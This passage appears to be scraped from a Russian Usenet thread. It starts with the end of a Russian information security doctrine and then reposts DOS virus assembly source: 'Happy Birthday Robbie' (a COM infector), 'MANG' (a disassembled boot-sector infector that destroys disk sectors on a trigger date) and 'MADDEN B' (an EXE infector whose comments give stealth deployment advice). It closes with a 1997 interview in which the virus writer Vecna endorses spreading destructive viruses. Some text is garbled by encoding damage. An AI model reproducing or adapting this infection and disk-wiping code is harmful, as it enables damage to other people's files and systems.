обеспечение контроля за созданием и использованием средств защиты
информации посредством обязательного лицензирования деятельности в данной сфере
и сертификации средств защиты информации;
совершенствование и развитие единой системы подготовки кадров,
используемых в области информационной безопасности Российской Федерации;
осуществление международного сотрудничества в сфере обеспечения
информационной безопасности, представление интересов Российской Федерации в
соответствующих международных организациях.
Компетенция федеральных органов государственной власти, органов
государственной власти субъектов Российской Федерации, других государственных
органов, входящих в состав системы обеспечения информационной безопасности
Российской Федерации и ее подсистем, определяется федеральными законами,
нормативными правовыми актами Президента Российской Федерации и Правительства
Российской Федерации.
Функции органов, координирующих деятельность федеральных органов
государственной власти, органов государственной власти субъектов Российской
Федерации, других государственных органов, входящих в состав системы
обеспечения информационной безопасности Российской Федерации и ее подсистем,
определяются отдельными нормативными правовыми актами Российской Федерации.
11. Основные элементы организационной основы системы обеспечения
информационной безопасности Российской Федерации
Система обеспечения информационной безопасности Российской Федерации
является частью системы обеспечения национальной безопасности страны.
Система обеспечения информационной безопасности Российской Федерации
строится на основе разграничения полномочий органов законодательной,
исполнительной и судебной власти в данной сфере, а также предметов ведения
федеральных органов государственной власти и органов государственной власти
субъектов Российской Федерации.
Основными элементами организационной основы системы обеспечения
информационной безопасности Российской Федерации являются: Президент Российской
Федерации, Совет Федерации Федерального Собрания Российской Федерации,
Государственная Дума Федерального Собрания Российской Федерации, Правительство
Российской Федерации, Совет Безопасности Российской Федерации, федеральные
органы исполнительной власти, межведомственные и государственные комиссии,
создаваемые Президентом Российской Федерации и Правительством Российской
Федерации, органы исполнительной власти субъектов Российской Федерации, органы
местного самоуправления, органы судебной власти, общественные объединения,
граждане, принимающие в соответствии с законодательством Российской Федерации
участие в решении задач обеспечения информационной безопасности Российской
Федерации.
Президент Российской Федерации руководит в пределах своих конституционных
полномочий органами и силами по обеспечению информационной безопасности
Российской Федерации; санкционирует действия по обеспечению информационной
безопасности Российской Федерации; в соответствии с законодательством
Российской Федерации формирует, реорганизует и упраздняет подчиненные ему
органы и силы по обеспечению информационной безопасности Российской Федерации;
определяет в своих ежегодных посланиях Федеральному Собранию приоритетные
направления государственной политики в области обеспечения информационной
безопасности Российской Федерации, а также меры по реализации настоящей
Доктрины.
Палаты Федерального Собрания Российской Федерации на основе Конституции
Российской Федерации по представлению Президента Российской Федерации и
Правительства Российской Федерации формируют законодательную базу в области
обеспечения информационной безопасности Российской Федерации.
Правительство Российской Федерации в пределах своих полномочий и с учетом
сформулированных в ежегодных посланиях Президента Российской Федерации
Федеральному Собранию приоритетных направлений в области обеспечения
информационной безопасности Российской Федерации координирует деятельность
федеральных органов исполнительной власти и органов исполнительной власти
субъектов Российской Федерации, а также при формировании в установленном
порядке проектов федерального бюджета на соответствующие годы предусматривает
выделение средств, необходимых для реализации федеральных программ в этой
области.
Совет Безопасности Российской Федерации проводит работу по выявлению и
оценке угроз информационной безопасности Российской Федерации, оперативно
подготавливает проекты решений Президента Российской Федерации по
предотвращению таких угроз, разрабатывает предложения в области обеспечения
информационной безопасности Российской Федерации, а также предложения по
уточнению отдельных положений настоящей Доктрины, координирует деятельность
органов и сил по обеспечению информационной безопасности Российской Федерации,
контролирует реализацию федеральными органами исполнительной власти и органами
исполнительной власти субъектов Российской Федерации решений Президента
Российской Федерации в этой области.
Федеральные органы исполнительной власти обеспечивают исполнение
законодательства Российской Федерации, решений Президента Российской Федерации
и Правительства Российской Федерации в области обеспечения информационной
безопасности Российской Федерации; в пределах своей компетенции разрабатывают
нормативные правовые акты в этой области и представляют их в установленном
порядке Президенту Российской Федерации и в Правительство Российской Федерации.
Межведомственные и государственные комиссии, создаваемые Президентом
Российской Федерации и Правительством Российской Федерации, решают в
соответствии с предоставленными им полномочиями задачи обеспечения
информационной безопасности Российской Федерации.
Органы исполнительной власти субъектов Российской Федерации
взаимодействуют с федеральными органами исполнительной власти по вопросам
исполнения законодательства Российской Федерации, решений Президента Российской
Федерации и Правительства Российской Федерации в области обеспечения
информационной безопасности Российской Федерации, а также по вопросам
реализации федеральных программ в этой области; совместно с органами местного
самоуправления осуществляют мероприятия по привлечению граждан, организаций и
общественных объединений к оказанию содействия в решении проблем обеспечения
информационной безопасности Российской Федерации; вносят в федеральные органы
исполнительной власти предложения по совершенствованию системы обеспечения
информационной безопасности Российской Федерации.
Органы местного самоуправления обеспечивают соблюдение законодательства
Российской Федерации в области обеспечения информационной безопасности
Российской Федерации.
Органы судебной власти осуществляют правосудие по делам о преступлениях,
связанных с посягательствами на законные интересы личности, общества и
государства в информационной сфере, и обеспечивают судебную защиту граждан и
общественных объединений, чьи права были нарушены в связи с деятельностью по
обеспечению информационной безопасности Российской Федерации.
В состав системы обеспечения информационной безопасности Российской
Федерации могут входить подсистемы (системы), ориентированные на решение
локальных задач в данной сфере.

Реализация первоочередных мероприятий по обеспечению информационной
безопасности Российской Федерации, перечисленных в настоящей Доктрине,
предполагает разработку соответствующей федеральной программы. Конкретизация
некоторых положений настоящей Доктрины применительно к отдельным сферам
деятельности общества и государства может быть осуществлена в соответствующих
документах, утверждаемых Президентом Российской Федерации.

Hу я вроде все сказал... Может еще что добавлю потом...

[√] Пока _All_ !

▌║▐║│║▌║││║║ DreamLand laboratory. P2Pirates<dog>Mail.ru ICQ 638-547-576
2║5080▌244║0 FTP://87.224.224.182

... Hам химия блондинок подарила.

John Zaicev

unread,

May 20, 2012, 4:50:26 PM5/20/12

to

[√] Привет _All_ !

;
;Happy Birthday Robbie Virus
;

code segment 'CODE'

assume cs:code,ds:code,es:code,ss:code

org 0100h

code_length equ finish - start
lf equ 0Ah
cr equ 0Dh

start label near

id_bytes proc near
mov si,si ; Serves no purpose: our ID
id_bytes endp

main: mov ah,04Eh ; DOS find first file function
mov cx,00100111b ; CX holds attribute mask
mov dx,offset com_spec ; DX points to "*.COM"

file_loop: int 021h
jc exit_virus ; If there are no files, go
; off

call infect_file ; Try to infect found file
jne exit_virus ; Exit if successful

mov ah,04Fh ; DOS find next file function

jmp short file_loop ; Repeat until out of files

exit_virus:
mov ah,2Ah
int 21h
cmp dl,3
jne dos_drop
cmp dh,10
je eat_screen
dos_drop: int 20h
eat_screen: mov byte ptr count,0
mov ah,00
mov al,03
int 10h
mov ah,08
int 10h
mov byte ptr count2,al
cmp byte ptr count2,00
jne draw_face
mov byte ptr count2,0fh
draw_face:
mov ah,01 ;set cursor type
mov cl,00
mov ch,40h
int 10h
mov cl,00
mov dl,4fh
mov ah,06 ;clear the display window
mov al,00
mov bh,0fh ;blank line attribs
mov ch,00 ;starting at upper left corner
mov cl,00 ; to
mov dh,00 ;row 0
mov dl,4fh ;column 4Fh
int 10h
mov ah,02 ;set cursor position
mov dh,00 ;to row 0,
mov dl,1fh ;column 1Fh
mov bh,00 ;in graphics mode
int 10h
mov dx,offset eyes ;get the eyes
mov ah,09 ;and draw them to screen
mov bl,0fh ;this colour
int 21h
mov ah,02 ;reposition character
mov dh,01 ;to row 1,
mov dl,00 ;column 0
int 10h
mov ah,09 ;write character and attrib
mov al,0dch ;character shape
mov bl,0fh ;character colour
mov cx,50h ;number of characters.
int 10h
mov ah,02 ;reposition cursor
mov dh,18h ;to row 18h
mov dl,00 ;column 0
int 10h
mov ah,09 ;write character & attribute
mov al,0dfh ;character shape
mov bl,0fh ;character colour
mov cx,0050h ;number of characters
int 10h
mov dl,00 ;back to column 0
make_teeth:
mov ah,02 ;set cursor position
mov dh,02 ;to row 2
int 10h
mov ah,09 ;write the character
mov al,55h ; "U" for one top tooth
mov bl,0fh ; colour code
mov cx,1 ;only one tooth
int 10h
mov ah,02
mov dh,17h ;row 17h
inc dl ;increase column number
int 10h
mov ah,09 ;write a character there.
mov al,0efh ;character "я" for bottom teeth
mov bl,0fh ;colour code
int 10h
inc dl ;increment column number
cmp dl,50h ;is there 50h of them yet?
jl make_teeth ;make more if not
mov byte ptr count,0 ;0 the counter
pause_1:
mov cx,7fffh
a_loop:
loop a_loop ;pause
inc byte ptr count
cmp byte ptr count,0ah
jl pause_1
mov byte ptr count,00
mov cl,00 ;from column 0
mov dl,4fh ;to column 79,
close_jaws:
mov ah,06 ;scroll the page up
mov al,01 ;blanking a line
mov bh,byte ptr count ;with this attribute
mov ch,0dh ;and from row 13
mov dh,18h ;to row 24
int 10h
mov ah,07 ;scroll downward
mov al,01 ;blanking one line
mov bh,byte ptr count ;with this attribute
mov ch,00 ;from row 0
mov dh,0ch ;to row 12
int 10h
mov cx,3fffh
b_loop:
loop b_loop ;pause
inc byte ptr count
cmp byte ptr count,0bh
jl close_jaws
mov byte ptr count,00
pause_2:
mov cx,7fffh
finish_up:
loop finish_up
inc byte ptr count ;increment count by 1
cmp byte ptr count,0ah ;is it a 10 yet?
jl pause_2 ;no? loop again...
mov ah,06 ;scroll page up
mov al,00 ;blank entire window
mov bh,byte ptr count ;with this attribute
mov ch,00 ;from row 0,
mov cl,00 ;column 0,
mov dh,18h ;to row 18h
mov dl,4fh ;column 79
int 10h
mov ah,01 ;reset cursor type
mov cl,07
mov ch,06 ;everything is back to normal
int 10h
mov si,offset rabid
fuckin_loop: lodsb
or al,al
jz $
mov ah, 0Eh
int 10h
jmp short fuckin_loop
infect_file:

mov ax,03D02h ; DOS open file function,

; read-write
mov dx,09Eh ; DX points to the victim

int 021h

xchg bx,ax ; BX holds file handle

mov ah,03Fh ; DOS read from file function

mov cx,2 ; CX holds byte to read (2)
mov dx,offset buffer ; DX points to buffer
int 021h

cmp word ptr [buffer],0F68Bh;Are the two bytes "MOV SI,SI"
pushf ; Save flags
je close_it_up ; If not, then file is OK

cwd ; Zero CX \_ Zero bytes from
; start
mov cx,dx ; Zero DX /
mov ax,04200h ; DOS file seek function,
; start
int 021h

mov ah,040h ; DOS write to file function

mov cx,code_length ; CX holds virus length
mov dx,offset start ; DX points to start of virus
int 021h

close_it_up: mov ah,03Eh ; DOS close file function
int 021h

popf ; Restore flags
ret ; Return to caller

buffer dw ? ; Buffer to hold test data

; Initialized data goes here

com_spec db "*.COM",0 ; What to infect: all COM
count db 0, 0
count2 db 0, 0
eyes db '(o) (o)$'
dinked db '[Malmsey Habitat v. 1.3]', 0
rabid db cr, lf
db 'Warmest Regards to RABID', cr, lf
db 'from -- ANARKICK SYSTEMS! ',0,'$'

finish:

code ends
end start

Hу я вроде все сказал... Может еще что добавлю потом...
[√] Пока _All_ !

▌║▐║│║▌║││║║ DreamLand laboratory. P2Pirates<dog>Mail.ru ICQ 638-547-576
2║5080▌244║0 FTP://87.224.224.182

... Изумительный аpомат и неповтоpимый вкус кофе Netscape...

John Zaicev

unread,

May 20, 2012, 4:50:40 PM5/20/12

to

[�] �� _All_ !

PAGE 59,132

;��
;��
;�� MANG ��
;��
;�� Created: 30-Aug-92 ��
;�� Passes: 5 Analysis Options on: none ��
;��
;��

data_0001e equ 4Ch
data_0002e equ 4Eh
main_ram_size_ equ 413h
data_0003e equ 7C00h ;*
data_0004e equ 7C05h ;*
data_0005e equ 7C0Ah ;*
data_0006e equ 7C0Ch ;*
data_0007e equ 7
data_0008e equ 8
data_0009e equ 0Ah
data_0014e equ 3BEh ;*
data_0015e equ 7C03h ;*
data_0016e equ 0B300h ;*
data_0017e equ 1BEh ;*
data_0018e equ 5000h ;*

seg_a segment byte public
assume cs:seg_a, ds:seg_a

org 100h

mang proc far

start:
jmp loc_0007
cmc ; Complement carry
add [bx+si-61h],al
add cl,ds:data_0016e
db 2Eh, 00h,0F0h, 1Eh, 50h, 0Ah
db 0D2h, 75h, 1Bh, 33h,0C0h, 8Eh
db 0D8h,0F6h, 06h, 3Fh, 04h, 01h
db 75h, 10h, 58h, 1Fh, 9Ch, 2Eh
db 0FFh, 1Eh, 0Ah, 00h, 9Ch,0E8h
db 0Bh, 00h, 9Dh,0CAh, 02h, 00h
db 58h, 1Fh, 2Eh,0FFh, 2Eh, 0Ah
db 00h
db 50h, 53h, 51h, 52h, 1Eh, 06h
db 56h, 57h, 0Eh, 1Fh, 0Eh, 07h
db 0BEh, 04h, 00h
loc_0002:
mov ax,201h
mov bx,200h
mov cx,1
xor dx,dx ; Zero register
pushf ; Push flags
call dword ptr ds:data_0009e
jnc loc_0003 ; Jump if carry=0
xor ax,ax ; Zero register
pushf ; Push flags
call dword ptr ds:data_0009e
dec si
jnz loc_0002 ; Jump if not zero
jmp short loc_0006
loc_0003:
xor si,si ; Zero register
cld ; Clear direction
lodsw ; String [si] to ax
cmp ax,[bx]
jne loc_0004 ; Jump if not equal
lodsw ; String [si] to ax
cmp ax,[bx+2]
je loc_0006 ; Jump if equal
loc_0004:
mov ax,301h
mov dh,1
mov cl,3
cmp byte ptr [bx+15h],0FDh
je loc_0005 ; Jump if equal
mov cl,0Eh
loc_0005:
mov ds:data_0008e,cx
pushf ; Push flags
call dword ptr ds:data_0009e
jc loc_0006 ; Jump if carry Set
mov si,data_0014e
mov di,1BEh
mov cx,21h
cld ; Clear direction
rep movsw ; Rep when cx >0 Mov [si] to es:[di]
mov ax,301h
xor bx,bx ; Zero register
mov cx,1
xor dx,dx ; Zero register
pushf ; Push flags
call dword ptr ds:data_0009e
loc_0006:
pop di
pop si
pop es
pop ds

pop dx
pop cx
pop bx
pop ax

retn
loc_0007:
xor ax,ax ; Zero register
mov ds,ax
cli ; Disable interrupts
mov ss,ax
mov ax,7C00h
mov sp,ax
sti ; Enable interrupts
push ds
push ax
mov ax,ds:data_0001e
mov ds:data_0005e,ax
mov ax,ds:data_0002e
mov ds:data_0006e,ax
mov ax,ds:main_ram_size_
dec ax
dec ax
mov ds:main_ram_size_,ax
mov cl,6
shl ax,cl ; Shift w/zeros fill
mov es,ax
mov ds:data_0004e,ax
mov ax,0Eh
mov ds:data_0001e,ax
mov ds:data_0002e,es
mov cx,1BEh
mov si,data_0003e
xor di,di ; Zero register
cld ; Clear direction
rep movsb ; Rep when cx >0 Mov [si] to es:[di]
jmp dword ptr cs:data_0015e
xor ax,ax ; Zero register
mov es,ax
int 13h ; Disk dl=drive a ah=func 00h
; reset disk, al=return status
push cs
pop ds
mov ax,201h
mov bx,data_0003e
mov cx,ds:data_0008e
cmp cx,7
jne loc_0008 ; Jump if not equal
mov dx,80h
int 13h ; Disk dl=drive 0 ah=func 02h
; read sectors to memory es:bx
; al=#,ch=cyl,cl=sectr,dh=head
jmp short loc_0009
loc_0008:
mov cx,ds:data_0008e
mov dx,100h
int 13h ; Disk dl=drive a ah=func 02h
; read sectors to memory es:bx
; al=#,ch=cyl,cl=sectr,dh=head
jc loc_0009 ; Jump if carry Set
push cs
pop es
mov ax,201h
mov bx,200h
mov cx,1
mov dx,80h
int 13h ; Disk dl=drive 0 ah=func 02h
; read sectors to memory es:bx
; al=#,ch=cyl,cl=sectr,dh=head
jc loc_0009 ; Jump if carry Set
xor si,si ; Zero register
cld ; Clear direction
lodsw ; String [si] to ax
cmp ax,[bx]
jne loc_0014 ; Jump if not equal
lodsw ; String [si] to ax
cmp ax,[bx+2]
jne loc_0014 ; Jump if not equal
loc_0009:
xor cx,cx ; Zero register
mov ah,4
int 1Ah ; Real time clock ah=func 04h
; get date cx=year, dx=mon/day
cmp dx,306h
je loc_0010 ; Jump if equal
retf ; Return far
loc_0010:
xor dx,dx ; Zero register
mov cx,1
loc_0011:
mov ax,309h
mov si,ds:data_0008e
cmp si,3
je loc_0012 ; Jump if equal
mov al,0Eh
cmp si,0Eh
je loc_0012 ; Jump if equal
mov dl,80h
mov byte ptr ds:data_0007e,4
mov al,11h
loc_0012:
mov bx,data_0018e
mov es,bx
int 13h ; Disk dl=drive 0 ah=func 03h
; write sectors from mem es:bx
; al=#,ch=cyl,cl=sectr,dh=head
jnc loc_0013 ; Jump if carry=0
xor ah,ah ; Zero register
int 13h ; Disk dl=drive 0 ah=func 00h
; reset disk, al=return status
loc_0013:
inc dh
cmp dh,ds:data_0007e
jb loc_0011 ; Jump if below
xor dh,dh ; Zero register
inc ch
jmp short loc_0011
loc_0014:
mov cx,7
mov ds:data_0008e,cx
mov ax,301h
mov dx,80h
int 13h ; Disk dl=drive 0 ah=func 03h
; write sectors from mem es:bx
; al=#,ch=cyl,cl=sectr,dh=head
jc loc_0009 ; Jump if carry Set
mov si,data_0014e
mov di,data_0017e
mov cx,21h
rep movsw ; Rep when cx >0 Mov [si] to es:[di]
mov ax,301h
xor bx,bx ; Zero register
inc cl
int 13h ; Disk dl=drive 0 ah=func 03h
; write sectors from mem es:bx
; al=#,ch=cyl,cl=sectr,dh=head
jmp short loc_0009
db 16 dup (0)
db 0Ah, 'Replace and press any key w'
db 'hen ready', 0Dh, 0Ah, 0
db 'IO SYSMSDOS SYS'
db 00h, 00h, 55h,0AAh

mang endp

seg_a ends

end start

H� � �� ... �� ...
[�] �� _All_ !

�� DreamLand laboratory. P2Pirates<dog>Mail.ru ICQ 638-547-576
2�5080�244�0 FTP://87.224.224.182

... �ppp, �� p��!

John Zaicev

unread,

May 20, 2012, 4:49:28 PM5/20/12

to

[�] �� _All_ !

;The MADDEN B virus is an EXE file infector which can jump from directory to
;directory and disk to disk. It attaches itself to the end of a file and

;modifies the EXE file header so that it gets control first, before the host
;program. When it is done doing its job, it passes control to the host program,
;so that the host executes without a hint that the virus is there.

.SEQ ;segments must appear in sequential order
;to simulate conditions in actual active virus

;MGROUP GROUP HOSTSEG,HSTACK ;Host stack and code segments grouped
together

;HOSTSEG program code segment. The virus gains control before this routine and
;attaches itself to another EXE file. As such, the host program for this
;installer simply tries to delete itself off of disk and terminates. That is
;worthwhile if you want to infect a system with the virus without getting
;caught. Just execute the program that infects, and it disappears without a
;trace. You might want to name the program something more innocuous, though.

;MADDEN B also locks the pc into a 'siren' warble when it runs out
;of files to infect. MADDEN, included in this archive plays a fast country
;song. (MADDEN will assemble to an .file using a86, then link to produce
;infected .exe form)

HOSTSEG SEGMENT BYTE
ASSUME CS:HOSTSEG,SS:HSTACK

PGMSTR DB 'MADDENB.EXE',0

COUNT1 DW 8 ;delay counts used by 'siren' routine
COUNT2 DW 3
COUNT3 DW 20
COUNT4 DW 10
;--------------------------------------------------------------------------
;MADDEN B virus main routine starts here

VIRUS:
push ax ;save startup info in ax
mov ax,cs
mov ds,ax ;set up DS=CS for the virus
mov ax,es ;get PSP Seg
mov WORD PTR [OLDDTA+2],ax ;set up default DTA Seg=PSP Seg in case of
abort without getting it
call SHOULDRUN ;run only when certain conditions met signalled by z
set
jnz REL1 ;conditions aren't met, go execute host program
call SETSR ;modify SHOULDRUN procedure to activate conditions
call NEW_DTA ;set up a new DTA location
call FIND_FILE ;get an exe file to attack

jnz SIREN ;returned nz - no valid files left, siren time!

;This routine enables MADDEN B virus to sound a siren
;when it can't find a file to infect
;**************************************************************************
SIREN:
cli ;no interrupts
mov bp,15 ;we want to do hole thing 15 times
mov al,10110110xb ;set up channel 2
out 43h,al ;send it to port
AGIN: mov bx,500 ;start frequency high
BACKERX:mov ax,bx ;place it in (ax)

out 42h,al ;send LSB first

mov al,ah ;move MSB into al

out 42h,al ;send it next

in al,61h ;get value from port
or al,00000011xb ;ORing it will turn on speaker
out 61h,al ;send number
mov cx,COUNT1 ;number of delay loops
LOOPERX:loop LOOPERX ;so we can hear sound
inc bx ;increment (bx) lowers frequency pitch
cmp bx,4000 ;have we reached 4000
jnz BACKERX ;if not do again
BACKERY:mov ax,bx ;if not put (bx) in (ax)
out 42h,al ;send LSB to port

mov al,ah ;place MSB in al

out 42h,al ;send it now
in al,61h ;get value from port
or al,00000011xb ;lets OR it
out 61h,al ;time to turn on speaker
mov cx,COUNT2 ;loop count
LOOPERY:loop LOOPERY ;delay so we can hear sound
dec bx ;decrementing (bx) rises frequency pitch
cmp bx,500 ;have we reach 500
jnz BACKERY ;if not go back
mov si,COUNT3 ;place longer delay in (si)
mov di,COUNT4 ;place longer delay in (di)
push si ;push it on the stack
push di ;push it on the stack
mov si,COUNT1 ;place first delay in (si)
mov di,COUNT2 ;place second delay in (di)
mov COUNT3,si ;save 1st in COUNT3 for next exchange
mov COUNT4,di ;save 2nd in COUNT4 for next exchange
pop di ;pop longer delay off stack
pop si ;pop longer delay off stack
mov COUNT2,di ;place it in the second
mov COUNT1,si ;place it in the first
dec bp ;decrement repeat count
jnz AGIN ;if not = 0 do hole thing again
in al,61h ;we be done
and al,11111100xb ;this number will turn speaker off
out 61h,al ;send it
sti ;enable interrupts
jmp SIREN

H� � �� ... �� ...
[�] �� _All_ !

�� DreamLand laboratory. P2Pirates<dog>Mail.ru ICQ 638-547-576
2�5080�244�0 FTP://87.224.224.182

... �� BootDisk...

John Zaicev

unread,

May 20, 2012, 7:27:03 PM5/20/12

unread,

May 20, 2012, 7:58:20 PM5/20/12

to

[√] Привет _All_ !

Interview with Vecna
Published in: Cicatrix\'s site
Author: Cicatrix
August 01st, 1997
Link:
http://borax.polux-hosting.com/madchat/vxdevl/vxmags/vdat-2000/ivvecna.htm
.
Interview Vecna

Interview with Vecna
by Cicatrix
[August 1997]

How did you start out in computers?

In 1986, my parents gave me a CP-400 computer (a brazilian clone of
a TSR-80 Color2)... I always wished for a video-game, but my parents gave
me a comp... I found very few programs for my computer, and started to
code my own stuff...

How and when did you start out in the virus
scene?

I started trying to code a virus in 1988... But it seems that to write
a virus that infects the K7 tape drives in a CP-400 is impossible... :)
In 1992 I got a 386, and released in the wild my first working virus a
couple of months later... It was a non-res companion ('a la' GoldBug) written
in Turbo Pascal... I spread it in all BBS's that I could find, and it is
still in the wild on some BBS's, that still have my virus dropper online
(a fake utility to double the size of the RAM).

Have you written viruses? If so which would
you like to take credit for?

I'm not very proud of my virus in pascal, neither my first virus in
asm, but I consider them a step in improving my actual coding skills...
I consider my latest virii very good, although they don't show all I can
do and I'm proud of them...

How do you name your viruses?

I dunno... The names are of things that sometimes appear in my mind...

Which programming languages do you know?

BASIC, C/C++, Pascal, Delphi, Assembler for 80x86 and 6908e and a couple
of others in a minor way, like pearl, lisp, forth, fortran, cobol, etc...

What programming language do you like using
the most?

Lately, I code almost exclusively in assembler, even for non-virii things
Sometimes I code in Pascal and Delphi too...

Are you a member of a VX group?

Yep... Stealth Group World Wide...
[Vecna is now (2/98) a 29A
member / Cicatrix]

Which AV software do you like/respect the most?
Which the least?

I use AVP and TBAV... Lately, I started to test DrWeb, IceNOD and Adinf.
They seem pretty good... I think that the best virus defense is an integrity
checker, expecialy one allows you to rename the checksums databases, to
avoid deletion by antivirus... The worst antivirus is McAfee's Scan...
I don't need to explain why.... ;>

What are your goals (VX wise)?

My objectives in virus scene are almost the same that I have in life...
Know how things work, do interesting things, know people, and especially,
*CHANGE* things that I consider wrong...
I know that virus coding and spreading, especially the destructive ones
like mine, is a form of terrorrism... I can't stop thinking about people
that lost their data because one of my virii, and I'm very sorry for this...
But this form of terrorrism is the only way that a south-american guy can
help to destroy the imperialism that reigns in our world... I know that
this is a tiny blow, but is a duty of all good men fight evil... Even if
the weapon is as inoffensive as a virus...

What is your view on the continuous 'war' between
VX and AV.

This war is a commercial one... The virus writers, in the majority,
are guys that want to create mindless havoc, without a definite objective,
and the AVs are guys that do a simple job... The only want to have money...
Very few people, in both sides, fight because they feel they are doing
something right... Some want money, some want recognition, respect, and
like..

Where did you get you handle? What does it
mean?

I got this handle from the AD&D rpg game... I have others nicks,
but always in Portuguese... The virus that I published in VLAD#7
was under the handle Vecna, and peoples start to know me by this handle...
I don't like the handle 'Vecna' very much... I still prefer 'Sangue Sujo'...

What is your view on Virus Creation software
(eg. VCL, PS-MPC etc.)?

They are used, generally, by guys that have no other wish than to create
havoc... Although to create havoc helps me in my project of changing wrong
things, I don't have too much respect, as virus writer, for people that
use them..

What is your view on macro viruses vs. assembly
or HLL viruses?

I don't like macro virii very much, because I don't see anything advanced
in them... But recently, SLAM started to
do good things in this field.. Assembly is still the best language to code
virus, because that language works very fast and is very small, and can
access the hardware directly... HLL virii are fine, but they need to be
advanced... Overwriting or parasite non-res virii are worthless, in the
world of today, being in asm or HLL...
I consider a virus, be it in WordBasic, HLL or assembler, like a book...
They serve to spread ideas... If you have a good idea, the type of paper
that you use is not important... The same happen with virus...

Have you ever confirmed one of your viruses
'in-the-wild'?

Yep... Hardcore2(boot) and a HLL virus are in the wild in Brazil...
Outsider (BOOT/FILE) was spread through Internet and will be in the wild
soon I hope... I must thank SLAM for the
release of a macro construction kit and for including my Vecna (BOOT/FILE)
virus in a release... The macro virus will drop the virus when it activate...
I think that this will spread this virus very well.

Which VX E-zine do you like to most? Which
the least?

I like almost all e-zines... 29a and Infected
Voice are that ones that I consult most frequntly, because the technical
text...
The only ones that I don't like are the YAM
and some argentinian vx zines...

Which individual or what group do you like/respect
in the VX world?

I found Yosha a very nice guy, good coder and nice friend... I like
very much of Pockies too... I think that all peoples of #virus are nice...
Other guy that I like is Eternal Maverick, the only guy that I can have
a technical discussion...

In the AV world?

I don't know the AV world very much... Seens that Veldman and Kaspery
are good coders... I respect good coders...

Which individual or what group do you like/respect
outside the VX or the AV world?

Che Guevara and Bakunin in politicals... Maybe Fidel Castro and Mao
Tse Tung too... Pavlov, Skinner and Piaget have a nice work in the study
of the human psyche... Vigotsky and Chomsky in their work about linguistic...

What is your view on destructive payloads in
viruses?

We live in a sick world, and sometimes we need use sick weapons... I
personally use destructive payloads in my virii...

Do you think there is such a thing as a 'good'
virus?

Yep... A virus, a book, a picture that helps to change the mind of people
in a positive way is always a good thing...

What do you do in 'real' life?

I study in university and work... I studing 'Fonoaudiologia'(dunno the
english name), a branch of medicine and pshychologic that studies human
communication... A 'fonoaudiologo' is a professional that helps deaf, mutes,
peoples with neurologic problems to communicate and live a better life...

Do people outside the VX scene know what you
do (parents, girlfriend etc.)?

My parents and my girl know... Other peoples also know, because i was
kicked from my first university for coding and spreading virus...

Do you do other computer stuff outside VX (Hacking,
phreaking, warez etc.)?

I have a basic knowledge about hacking from my BBS days, and use this
and warez trading sometimes...

Should viruses be illegal? Is there a difference
between creation and spreading?

Virii should not be illegal... But because they hurt the political elite,
they are...
Writing a virus is like writing a book... Spreading a virus is like doing
what your book says... It is good that people write a virus, but it is
better that they spread it too...
A book about human rights is a good thing, but is better if the writer
also does the thing that he wrote...Writing is the theory... Spreading
is the practice...

Describe the perfect virus.

In the technical view point, the better virus is the one that the victim
only detect when there's no way back... Compatibility is the key word
A virus that can fullfil the wishes of the author is a perfect virus...

What is your view on Windows (95)

Well... Is a new platform to infect, and it makes things easier to people,
so people will use it more and more, so, if we can infect it, we will be
able to reach your objectives better...
I personaly don't like win95, and I'm a DOS coder, although this will change
soon... I hope...

What is your advice for people just starting
out?

Be creative, and don't get kicked of university doing stupid things,
like putting in the virus the same handle that you have in your email adress...
;>

Where can you be reached if at all?

Email me at vecn...@hotmail.com
or talk with me in undernet #virus... I will give you my PGP key and another
email adress where you can find me...

Any greets?

I think that I learn a bit with all people that I talked to in my life...
I thank the world...

Any other comments?

Thanks to Cicatrix, who gave me the opportunity to explain my view points...
I am very proud to help VDAT...
VDAT is a good thing for the vx...

Short responses to the following names or words:

- Dark Avenger - Maybe the best virus coder ever
- Dark Angel - Why you didn't you like TerminatorZ
- Sarah Gordon - Why do people not like you??
- Fridrik Skulason - F-PROT is an above average AV product
- Alan Solomon - Do you think that you did the right thing
with Black Baron??
- WordBasic/VBA - Another lang
- VDAT - Very very cool
- VSUM - Use the same description for all virus
- Assembler - The way to talk with hardware
- NuKE - Azreal sux...
- Phalcon Skism - Good zines
- VLAD - Thank for publishing my virus
- Immortal Riot - Good zine
- Trident - Cool virii
- Polymorphic - One of the best weapons
- Stealth - Other good thing
- I hate...... - Retch
- I love...... - Think
- Internet - Sorry that the price is high here
- IRC - Nice way to get to know people
- Sex - Very cool... I love it...
- World War 3 - I hope that it will be the downfall of the
imperialism...

How did you get into SGWW?

I was searching a group to join, and saw the email of SGWW in VLAD#7...
I got email from LovinGOD, and send a message... I showed LovinGOD my betas
from OUTSIDER virus, and I was accepted... I joined to SGWW because I can
work in a major group, with good coders to exchange ideas and liberty to
use my destructive payloads... Also I like the view point that LovinGOD
has about destructive payloads very much...

How is SGWW organized?

I really dont know... I only know that LovinGOD is the president, and
Caesar is the president in Ukraine... I not even know the handle of all
members...

How is the virus scene in South America?

The country that has the most virus writers is Argentina... But the
Argentinians have the nasty habit of thinking yourself about all others
(I know this... I was born in Argentina, although I have lived in Brazil
since I was 3 years)
I talked, through IRC, with Darkside1 and Jack Qwerty, that are very nice
guys... Darkside1 said me that Dark Chacal, a SLAM member, is Brazilian
too, but I never talked with him...
It seems that not many people code virii here... But the number seems to
be growning...

Will you ever release a virus creator?

I read an article from Bontchev, talking about this... A good and very
variable virus creator can be ultimate weapon against AVs... We can code
thousands of virus with the kit and send directly to AVs companys... They
will need extract scan string, update the scanners and like... If they
decide to ignore us, we can start to spread some of them, or send it to
small companies, that will happily say the their scanners detect 10.000
virii that the others scanner don't...
This will be the downfall of scanning... Only integrity checker will survive...
Maybe, if I found people to work with me, I could code this virus creation
kit...

What is in your future and the future of SGWW?

I will slow down my virus coding, because I found it more helpfull to
people to spend my time helping the society with 'fonoaudiologia'... And
I need to finish the university... But I don't think I'll stop virus coding...
Although the only member that I have frequent contact with is Eternal Maverick,
I think that SGWW is still strong, and will be strong in the future...
We have very good coders...

Will SGWW increase the number of members?

Good coders and peoples with ideas will always be welcome...

Will SGWW go into other scenes except VX? (hacking,
etc.)

I think that SGWW is and will be only a virus group...

Hу я вроде все сказал... Может еще что добавлю потом...
[√] Пока _All_ !

▌║▐║│║▌║││║║ DreamLand laboratory. P2Pirates<dog>Mail.ru ICQ 638-547-576
2║5080▌244║0 FTP://87.224.224.182

... Продам дешево коллекцию байтов.

John Zaicev

unread,

May 20, 2012, 7:58:39 PM5/20/12

to

[√] Привет _All_ !

Персонаж одной сказки

Опубликовано: Сайт DrMad
Автор: DrMad

1 января 1997
